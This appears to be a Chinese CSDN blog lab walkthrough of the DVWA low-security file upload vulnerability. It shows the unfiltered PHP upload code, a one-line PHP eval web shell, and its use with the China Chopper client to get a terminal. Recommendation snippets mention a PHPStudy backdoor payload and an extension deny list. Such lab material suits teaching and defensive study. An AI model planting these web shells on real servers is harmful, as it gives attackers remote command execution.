文件上传漏洞(低安全版)

最新推荐文章于 2023-10-16 12:00:51 发布
最新推荐文章于 2023-10-16 12:00:51 发布
阅读量156 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44188298/article/details/104593273
版权

一. 预备知识
在这里插入图片描述
二 准备工作:
中国菜刀
攻击机kali linux
靶机OWASP_Broken_Web_Apps_VM_1.2 (1)
下载地址:https://wiki.owasp.org/index.php/Category:OWASP_Download
打开靶机,在火狐上打开DVWA

第一节 文件上传基础漏洞(低安全版)
上传时没有对文件信息进行过滤和检测而导致文件上传漏洞。
php代码如下:

 if(isset($_POST["Upload"]))  {
    $target_path =DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path =$target_path.basename($_FILES['uploaded']['name']);
   
     if(!move_uploaded_file($_FILES['uploaded']['tmp_name'],$target_path))  {
          echo "<pre>";
          echo "Your image was not uploaded.";
          echo "<pre>";
       }else {
        echo "<pre>";
          echo  $target_path."succesfully uploaded!";
          echo "<pre>";
             }
 }

在这里插入代码片

1) 上传文件(shell1.php)
这里可以自己创建shell1.php,内容如下

<?php @eval($_POST['chopper']);?>

在这里插入图片描述

2)上传成功
在这里插入图片描述

3) 使用中国菜刀
在这里插入图片描述
获取虚拟终端权限制

流年无罪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress Plupload插件未明跨站脚本漏洞
weixin_30429201的博客
01-30 151
漏洞名称: WordPress Plupload插件未明跨站脚本漏洞 CNNVD编号: CNNVD-201301-531 发布时间: 2013-01-30 更新时间: 2013-01-30 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程 CVE编号: 漏...
Web安全文件上传漏洞
岸芷的博客
03-09 256
最近接触了Web安全,有点沉迷,这里介绍一种网站的文件上传漏洞 声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络空间需要我们共同维护。 需要的工具:火狐浏览器,Burp Suit,phpstudy,中国菜刀 第一步: 首先这是一个利用phpstudy搭建的网站,网站源码可以在github上搜DVWA,用来当做靶机测试,这个网站有各种各样的漏洞。 我们找到文件上传这...
文件上传漏洞(绕过姿势)
苟有恒,必有三更眠,五更起。
12-28 3209
0X00 前言文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。文件上传校验姿势 客户端javascript校验(一般只校验后缀名) 服务端校验 文件头content-type字段校验(image/gif) 文件内容头校验(GIF89a) 后缀名黑名单校验 后缀名白名单校验 WAF设
Upload-labs文件上传漏洞(双写绕过)——Pass10
Zichel77的博客
07-28 978
0×00 题目概述 所以说是双写吗? 0×01 源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv",.
Plupload插件
leon的博客
07-23 421
plupload的基本使用,单文件上传
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记 文件上传漏洞是 Web 应用程序中的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、...
计算机网络安全文件上传漏洞及防御措施.pdf
09-19
计算机网络安全文件上传漏洞及防御措施 计算机网络安全文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,...
利用 通达OA 文件上传漏洞上传webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA本11.6 3.攻击机...
第3章 3.WEB安全性测试--文件上传漏洞.mp4
05-08
第3章 3.WEB安全性测试--文件上传漏洞.mp4
奇安信代码卫士,文件上传漏洞解决demo
04-23
奇安信代码卫士,文件上传漏洞解决demo; #### 文件上传可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上传目录和上传文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2....
Shuriken:1【攻略】
weixin_51494407的博客
10-16 140
Shuriken: 1 Vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/
应用安全-CMF/CMS漏洞整理
weixin_30865427的博客
07-08 2842
PHPStudy WebShell后门 'accept-charset': 'ZWNobyBzeXN0ZW0od2hvYW1pKTsK', 'Accept-Encoding':'gzip,deflate' ThinkPHP RCE Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23SQL注入 ThinkPHP &lt...
记录使用plupload插件踩过的一个坑
qq_32430463的博客
11-11 753
记录一次在使用plupload过程中,初始化控件成功后,始终不触发上传动作 以下是我的html代码(此处由于业务需要先点击“打开上传控件“再选择图片上传) <button id="openUpload">打开上传控件</button> <div class="btm-local-style-cls" style="display: none"> &...
upload漏洞专题
热门推荐
goddemon
12-08 11万+
①典型内容伪造假装是图片 GIF89a?
metasploit魔鬼训练营_XSS
weixin_34037977的博客
11-11 1124
在owaspbwa环境下进行渗透,总结xss: ubuntu安装xsstrike模糊测试工具.之支持python3环境。XSStrike_模糊测试 Powerful fuzzing engine Context breaking technology Intelligent payload generation GET & POST method suppor...
PLUpload文件上传的使用
点滴
07-08 2万+
简单而且实用的大(多)文件前端上传组件PlUpload
文件上传安全漏洞修复
08-18
修复文件上传安全漏洞可以采取以下几个方案。首先,程序员需要对上传的文件进行严格的验证与过滤,确保只允许上传安全的文件类型,并且对文件进行检查,防止恶意脚本文件的上传。其次,可以通过设置上传目录的权限,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值